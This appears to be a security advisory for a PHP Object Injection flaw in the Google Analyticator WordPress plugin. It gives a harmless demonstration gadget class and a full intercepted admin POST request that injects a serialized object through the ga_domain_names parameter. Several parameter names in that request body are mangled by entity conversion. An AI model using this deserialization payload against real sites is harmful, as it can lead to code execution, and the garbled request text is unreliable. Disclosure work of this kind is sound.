The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present
To simulate a gadget chain, put the following code in a plugin: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Activate and access the plugin then select “Continue Without Authentication” button. Click “Save Changes” button, intercept this request and add parameter “ga_domain_names” with content: O:4:“Evil”:0:{} in body request. The view the response of the request made, which will have the “Arbitrary deserialization” message -– POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1 Host: localhost:8888 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8888/wp-admin/admin.php?page=google-analyticator Content-Type: application/x-www-form-urlencoded Content-Length: 638 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 _wpnonce=f83b45cab0&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga;_status=disabled&ga;_uid=UA-XXXXXXXX-X&ga;_analytic_snippet=disabled&key;_ga_show_ad=1&info;_update=Save+Changes&ga;_annon=0&ga;_admin_status=enabled&ga;_admin_role%5B%5D=administrator&ga;_admin_disable=remove&ga;_admin_disable_DimentionIndex=&ga;_enable_remarketing=0&key;_ga_track_login=0&ga;_outbound=enabled&ga;_event=enabled&ga;_enhanced_link_attr=disabled&ga;_downloads=&ga;_outbound_prefix=outgoing&ga;_downloads_prefix=download&ga;_adsense=&ga;_extra=&ga;_extra_after=&ga;_widgets=enabled&ga;_dashboard_role%5B%5D=administrator&ga;_domain_names=O:4:“Evil”:0:{};